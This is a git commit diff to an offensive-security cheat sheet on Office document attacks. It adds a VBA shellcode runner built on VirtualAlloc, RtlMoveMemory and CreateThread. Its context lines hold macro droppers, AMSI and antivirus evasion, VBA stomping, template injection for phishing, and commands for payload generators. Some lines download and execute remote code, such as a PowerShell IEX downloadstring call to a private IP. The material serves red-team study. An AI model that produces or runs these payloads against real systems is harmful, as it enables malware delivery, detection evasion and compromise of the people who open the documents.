Add Office execute WinAPI via VBA

This commit is contained in:
ZkClown 2023-04-20 15:00:33 +02:00
parent 47df1695a1
commit 2a4ce78080

View File

@ -1,9 +1,10 @@
# Office - Attacks
## Summary
### Summary
* [Office Products Features](#office-products-features)
* [Office Default Passwords](#office-default-passwords)
* [Office Macro execute WinAPI](#office-macro-execute-winapi)
* [Excel](#excel)
* [XLSM - Hot Manchego](#xlsm---hot-manchego)
* [XLS - Macrome](#xls---macrome)
@ -51,8 +52,55 @@ By default, Excel does not set a password when saving a new file. However, some
| Excel | VelvetSweatshop | all Excel formats |
| PowerPoint | 01Hannes Ruescher/01 | .pps .ppt |
## Office Macro execute WinAPI
## XLSM - Hot Manchego
### Description
To importe Win32 function we need to use the keyword `Private Declare`
`Private Declare Function <NAME> Lib "<DLL_NAME>" Alias "<FUNCTION_IMPORTED>" (<ByVal/ByRef> <NAME_VAR> As <TYPE>, etc.) As <TYPE>`
If we work on 64bit, we need to add the keyword `PtrSafe` between the keywords `Declare` and `Function`
Importing the `GetUserNameA` from `advapi32.dll`:
```VBA
Private Declare PtrSafe Function GetUserName Lib "advapi32.dll" Alias "GetUserNameA" (ByVal lpBuffer As String, ByRef nSize As Long) As Long
```
`GetUserNameA` prototype in C:
```C
BOOL GetUserNameA(
LPSTR lpBuffer,
LPDWORD pcbBuffer
);
```
### Example with a simple Shellcode Runner
```VBA
Private Declare PtrSafe Function VirtualAlloc Lib "Kernel32.dll" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "Kernel32.dll" (ByVal lDestination As LongPtr, ByRef sSource As Any, ByVal lLength As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "KERNEL32.dll" (ByVal SecurityAttributes As Long, ByVal StackSize As Long, ByVal StartFunction As LongPtr, ThreadParameter As LongPtr, ByVal CreateFlags As Long, ByRef ThreadId As Long) As LongPtr
Sub WinAPI()
Dim buf As Variant
Dim addr As LongPtr
Dim counter As Long
Dim data As Long
buf = Array(252, ...)
addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)
For counter = LBound(buf) To UBound(buf)
data = buf(counter)
res = RtlMoveMemory(addr + counter, data, 1)
Next counter
res = CreateThread(0, 0, addr, 0, 0, 0)
End Sub
```
## Excel
### XLSM - Hot Manchego
> When using EPPlus, the creation of the Excel document varied significantly enough that most A/V didn't catch a simple lolbas payload to get a beacon on a target machine.
@ -65,7 +113,7 @@ PS> C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /reference:EPPlus.dll
PS> .\hot-manchego.exe .\blank.xlsm .\vba.txt
```
## XLM - Macrome
### XLM - Macrome
> XOR Obfuscation technique will NOT work with VBA macros since VBA is stored in a different stream that will not be encrypted when you password protect the document. This only works for Excel 4.0 macros.
@ -96,7 +144,7 @@ Macrome build --decoy-document decoy_document.xls --payload-type Macro --payload
When using Macrome build mode, the --password flag may be used to encrypt the generated document using XOR Obfuscation. If the default password of **VelvetSweatshop** is used when building the document, all versions of Excel will automatically decrypt the document without any additional user input. This password can only be set in Excel 2003.
## XLM Excel 4.0 - SharpShooter
### XLM Excel 4.0 - SharpShooter
* https://github.com/mdsecactivebreach/SharpShooter
@ -120,7 +168,7 @@ SharpShooter.py --payload slk --output foo --rawscfile /tmp/shellcode-86.bin --s
```
## XLM Excel 4.0 - EXCELntDonut
### XLM Excel 4.0 - EXCELntDonut
* XLM (Excel 4.0) macros pre-date VBA and can be delivered in .xls files.
* AMSI has no visibility into XLM macros (for now)
@ -162,7 +210,7 @@ python3 drive.py --x64bin GruntHttpx64.bin --x86bin GruntHttpx86.bin
XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f1391a7a598b456855/_posts/2020-05-25-Weaponizing-28-Year-Old-XLM-Macros.md
## XLM Excel 4.0 - EXEC
### XLM Excel 4.0 - EXEC
1. Right Click to the current sheet
2. Insert a **Macro IntL MS Excel 4.0**
@ -175,7 +223,7 @@ XLM: https://github.com/Synzack/synzack.github.io/blob/3dd471d4f15db9e82c20e2f13
5. Hide your macro worksheet by a right mouse click on the sheet name **Macro1** and selecting **Hide**
## SLK - EXEC
### SLK - EXEC
```ps1
ID;P
@ -186,8 +234,9 @@ C;X1;Y102;K0;EHALT()
E
```
## Word
## DOCM - Metasploit
### DOCM - Metasploit
```ps1
use exploit/multi/fileformat/office_word_macro
@ -200,7 +249,7 @@ set FILENAME Financial2021.docm
exploit -j
```
## DOCM - Download and Execute
### DOCM - Download and Execute
> Detected by Defender (AMSI)
@ -215,7 +264,7 @@ Execute
End Sub
```
## DOCM - Macro Creator
### DOCM - Macro Creator
* https://github.com/Arno0x/PowerShellScripts/tree/master/MacroCreator
@ -228,7 +277,7 @@ C:\PS> Invoke-MacroCreator -i meterpreter_shellcode.raw -t shellcode -url webdav
C:\PS> Invoke-MacroCreator -i regsvr32.sct -t file -url 'http://my.server.com/sources.xml' -d biblio -c 'regsvr32 /u /n /s /i:regsvr32.sct scrobj.dll' -o -e
```
## DOCM - C# converted to Office VBA macro
### DOCM - C# converted to Office VBA macro
> A message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim to thinking the excel document is corrupted.
@ -238,7 +287,7 @@ https://github.com/trustedsec/unicorn
python unicorn.py payload.cs cs macro
```
## DOCM - VBA Wscript
### DOCM - VBA Wscript
> https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office
@ -263,7 +312,7 @@ CreateObject("WScript.Shell").Exec "notepad.exe"
```
## DOCM - VBA Shell Execute Comment
### DOCM - VBA Shell Execute Comment
Set your command payload inside the **Comment** metadata of the document.
@ -287,7 +336,7 @@ End Sub
```
## DOCM - VBA Spawning via svchost.exe using Scheduled Task
### DOCM - VBA Spawning via svchost.exe using Scheduled Task
```ps1
Sub AutoOpen()
@ -311,7 +360,7 @@ End Sub
Rem powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.59:80/fezsdfqs'))"
```
## DOCM - WMI COM functions
### DOCM - WMI COM functions
Basic WMI exec (detected by Defender) : `r = GetObject("winmgmts:\\.\root\cimv2:Win32_Process").Create("calc.exe", null, null, intProcessID)`
@ -357,7 +406,7 @@ Set SW = GetObject("new:" & ShellWindows).Item()
SW.Document.Application.ShellExecute "cmd.exe", "/c powershell.exe", "C:\Windows\System32", Null, 0
```
## DOCM/XLM - Macro Pack - Macro and DDE
### DOCM/XLM - Macro Pack - Macro and DDE
> Only the community version is available online.
@ -419,7 +468,7 @@ echo "x86.bin" "x64.bin" | macro_pack.exe -t AUTOSHELLCODE -o autopack -G sc_
echo "http://192.168.5.10:8080/x32calc.bin" "http://192.168.5.10:8080/x64calc.bin" | macro_pack.exe -t DROPPER_SHELLCODE -o --shellcodemethod=ClassicIndirect -G samples\sc_dl.xls
```
## DOCM - BadAssMacros
### DOCM - BadAssMacros
> C# based automated Malicous Macro Generator.
@ -443,7 +492,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
```
## DOCM - CACTUSTORCH VBA Module
### DOCM - CACTUSTORCH VBA Module
> CactusTorch is leveraging the DotNetToJscript technique to load a .Net compiled binary into memory and execute it from vbscript
@ -465,7 +514,7 @@ BadAssMacros.exe -i <path_to_doc/excel_file> -w <doc/excel> -p yes -o <path_to_o
6. Use the generated code to replace the hardcoded binary in CactusTorch
## DOCM - MMG with Custom DL + Exec
### DOCM - MMG with Custom DL + Exec
1. Custom Download in first Macro to "C:\\Users\\Public\\beacon.exe"
2. Create a custom binary execute using MMG
@ -514,7 +563,7 @@ Sub Auto_Open()
End Sub
```
## DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
### DOCM - ActiveX-based (InkPicture control, Painted event) Autorun macro
Go to **Developer tab** on ribbon `-> Insert -> More Controls -> Microsoft InkPicture Control`
@ -526,7 +575,7 @@ End Sub
## VBA Obfuscation
### VBA Obfuscation
```ps1
# https://www.youtube.com/watch?v=L0DlPOLx2k0
@ -534,13 +583,13 @@ $ git clone https://github.com/bonnetn/vba-obfuscator
$ cat example_macro/download_payload.vba | docker run -i --rm bonnetn/vba-obfuscator /dev/stdin
```
## VBA Purging
### VBA Purging
**VBA Stomping**: This technique allows attackers to remove compressed VBA code from Office documents and still execute malicious macros without many of the VBA keywords that AV engines had come to rely on for detection. == Removes P-code.
:warning: VBA stomping is not effective against Excel 97-2003 Workbook (.xls) format.
### OfficePurge
#### OfficePurge
* https://github.com/fireeye/OfficePurge/releases/download/v1.0/OfficePurge.exe
```powershell
@ -551,7 +600,7 @@ OfficePurge.exe -d word -f .\malicious.doc -l
```
### EvilClippy
#### EvilClippy
> Evil Clippy uses the OpenMCDF library to manipulate CFBF files.
> Evil Clippy compiles perfectly fine with the Mono C# compiler and has been tested on Linux, OSX and Windows.
@ -573,7 +622,7 @@ EvilClippy.exe -r macrofile.doc
```
## VBA - Offensive Security Template
### VBA - Offensive Security Template
* Reverse Shell VBA - https://github.com/JohnWoodman/VBA-Macro-Reverse-Shell/blob/main/VBA-Reverse-Shell.vba
* Process Dumper - https://github.com/JohnWoodman/VBA-Macro-Dump-Process
@ -583,7 +632,7 @@ EvilClippy.exe -r macrofile.doc
* amsiByPassWithRTLMoveMemory - https://gist.github.com/DanShaqFu/1c57c02660b2980d4816d14379c2c4f3
* VBA macro spawning a process with a spoofed parent - https://github.com/christophetd/spoofing-office-macro/blob/master/macro64.vba
## VBA - AMSI
### VBA - AMSI
> The Office VBA integration with AMSI is made up of three parts: (a) logging macro behavior, (b) triggering a scan on suspicious behavior, and (c) stopping a malicious macro upon detection. https://www.microsoft.com/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/
@ -625,11 +674,11 @@ Private Sub Document_Open()
End Sub
```
## DOCX - Template Injection
### DOCX - Template Injection
:warning: Does not require "Enable Macro"
### Remote Template
#### Remote Template
1. A malicious macro is saved in a Word template .dotm file
2. Benign .docx file is created based on one of the default MS Word Document templates
@ -647,7 +696,7 @@ End Sub
```
7. File gets zipped back up again and renamed to .docx
### Template Injections Tools
#### Template Injections Tools
* https://github.com/JohnWoodman/remoteInjector
* https://github.com/ryhanson/phishery
@ -661,7 +710,7 @@ $ phishery -u https://secure.site.local/docs -i good.docx -o bad.docx
```
## DOCX - DDE
### DOCX - DDE
* Insert > QuickPart > Field
* Right Click > Toggle Field Code